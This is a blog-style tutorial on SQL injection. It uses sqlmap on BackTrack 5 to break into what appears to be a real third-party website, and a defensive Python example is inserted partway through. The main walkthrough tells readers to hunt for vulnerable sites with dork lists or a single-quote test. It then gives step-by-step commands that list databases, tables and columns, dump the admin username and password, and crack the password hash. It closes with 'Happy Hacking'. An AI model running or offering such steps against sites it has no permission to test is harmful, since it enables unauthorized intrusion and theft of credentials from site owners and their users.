Introduction
A SQL injection is often used to attack the security of a website by entering SQL statements into a web form so that a badly designed website performs operations on the database other than those the designer intended. SQL injection is a code injection technique that exploits a security vulnerability in a website's software. The vulnerability arises when user input is either incorrectly filtered for string-literal escape characters embedded in SQL statements, or is not strongly typed and is therefore unexpectedly executed as part of the statement.
SQL commands are thus injected from the web form into the application's database (as queries) to change the database content or to dump database information, such as credit card numbers or passwords, to the attacker. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
The following report demonstrates the process involved in carrying out a SQL injection.
SQL Injection Tutorial
There are a number of tools available for SQL injection, but here we are going to use BackTrack 5.
Since BackTrack 5 ships with several tools for SQL injection, we are going to use one of them, sqlmap.
First we need to open the sqlmap application on BackTrack 5. Before we start, we need to find a vulnerable website to inject. To find one, we can download a "dork" list containing websites that are known to be vulnerable, or we can simply test on our own whether a site is vulnerable by adding a single quote (') at the end of the website's URL, which looks something like the URL below:
www.yboaofnc.com/event.php?id=35'
When you receive the database error shown above, it indicates that the website is vulnerable and can be injected with SQL code. If you do not get this error and the website refreshes to its main page or another page as normal, then this website is not vulnerable and you can start looking for another website to inject. In this case, we are going to use www.yboaofnc.com/event.php?id=35 for our demo.
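As an added illustration (not part of the original tutorial) of why the single-quote test above produces a database error and what a correctly built page does instead, the Python snippet below uses an in-memory SQLite table as a stand-in for the event lookup behind a page like event.php?id=35. The table name, its columns, the row data and the sample access-log lines are all constructed for the example. It shows the vulnerable string-concatenated query erroring on the input 35', the hardened version (integer validation plus a bound parameter) rejecting the same input before it ever reaches the database, and a small detection routine that flags log entries whose numeric id parameter carries anything but digits.

```python
import sqlite3
from urllib.parse import urlsplit, parse_qs


def make_db():
    """Constructed sample data: an in-memory SQLite table standing in for the
    event records behind a page such as event.php?id=35 (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE event (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO event VALUES (?, ?)",
                     [(35, "Spring meet"), (36, "Summer meet")])
    return conn


def lookup_vulnerable(conn, user_id):
    """The badly designed lookup: the raw query-string value is pasted straight
    into the statement. A trailing quote breaks the SQL, which is exactly the
    database error the tutorial uses as its 'is it injectable' signal."""
    sql = "SELECT title FROM event WHERE id = %s" % user_id
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, user_id):
    """The hardened lookup: enforce the expected type first, then bind the value
    as a parameter so the database driver never parses it as SQL."""
    if not user_id.isdigit():
        raise ValueError("id must be a positive integer")
    sql = "SELECT title FROM event WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (int(user_id),))]


def probe_result(lookup, user_id):
    """Run a lookup against a fresh database and report what an observer sees:
    ('rows', [...]), ('db_error', message) or ('rejected', message)."""
    conn = make_db()
    try:
        return ("rows", lookup(conn, user_id))
    except sqlite3.OperationalError as exc:
        return ("db_error", str(exc))
    except ValueError as exc:
        return ("rejected", str(exc))
    finally:
        conn.close()


# Constructed access-log lines in Common Log Format; the second request carries
# a percent-encoded single quote (%27) on the id parameter, i.e. the probe above.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2000:13:55:36 +0000] "GET /event.php?id=35 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2000:13:55:40 +0000] "GET /event.php?id=35%27 HTTP/1.1" 500 87',
    '203.0.113.5 - - [10/Oct/2000:13:55:41 +0000] "GET /index.php HTTP/1.1" 200 2048',
]

NUMERIC_PARAMS = {"id"}  # query parameters the application expects to be integers


def flag_suspicious_requests(log_lines):
    """Detection: return the request paths whose numeric parameters contain
    anything other than digits (a quote, whitespace, a comment marker, ...)."""
    flagged = []
    for line in log_lines:
        parts = line.split('"')
        if len(parts) < 2:
            continue
        request = parts[1].split(" ")
        if len(request) < 2:
            continue
        path = request[1]
        # parse_qs decodes percent-encoding, so %27 comes back as a literal quote
        query = parse_qs(urlsplit(path).query, keep_blank_values=True)
        for name in NUMERIC_PARAMS:
            if any(not value.isdigit() for value in query.get(name, [])):
                flagged.append(path)
                break
    return flagged


if __name__ == "__main__":
    for label, lookup in (("vulnerable", lookup_vulnerable), ("safe", lookup_safe)):
        for probe in ("35", "35'"):
            print(label, repr(probe), probe_result(lookup, probe))
    print("flagged:", flag_suspicious_requests(SAMPLE_LOG))
```

Running the script prints the vulnerable lookup returning a row for 35 and a database error for 35', while the safe lookup returns the same row and a validation rejection respectively; the log scan reports only the request carrying the encoded quote. The point of the hardened version is that the decision is made on the input's type before the database is involved, and the parameter binding means even a value that slips past validation is treated as data, not SQL.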
Once you open sqlmap in BackTrack, the first step is to scan the URL to see whether it is injectable and, at the same time, to retrieve the databases available on the particular website. To do that, enter the following command:
python sqlmap.py -u www.yboaofnc.com/event.php?id=35 --dbs
Once the scan is complete, it shows the databases available on the target site. In this case three databases were found: information_schema, test and yboa.
Next, we want to view the tables of a database. For that, we select one of the databases; in this case we choose the yboa database. Then type this command to view its tables:
python sqlmap.py -u www.yboaofnc.com/event.php?id=35 -D yboa --tables
Once done, it shows all the tables inside the selected database; the screenshot above shows a number of tables inside yboa.
Now we want to view the columns of one of the tables listed above. In this case, we are going to view the columns of the table 'allowed'. To do so, type this command:
python sqlmap.py -u www.yboaofnc.com/event.php?id=35 -D yboa -T allowed --columns
Once the above command is entered, we can view the list of columns of the table 'allowed'. It has three columns: 'id', 'pwd' and 'uname'.
The last step of this tutorial is to dump the 'pwd' and 'uname' columns to get the username and the password. First, let us dump the password. To do so, enter the following command:
python sqlmap.py -u www.yboaofnc.com/event.php?id=35 -D yboa -T allowed -C pwd --dump
Once the above command is executed, the hash value of the password is shown. sqlmap then offers the option of running a dictionary attack against the hash. Enter 'Y' for yes to retrieve the password. Finally, the login password is shown; in this case the password is 'sha1_generic_passwd'.
The same method used to dump the password is used to retrieve the username, but instead of dumping 'pwd' we now dump 'uname'. Once the command below is entered, we get the username, which is 'admin' in this case.
python sqlmap.py -u www.yboaofnc.com/event.php?id=35 -D yboa -T allowed -C uname --dump
~ Happy Hacking ~
Need help..
How do you find the php?id=(number) on a webpage?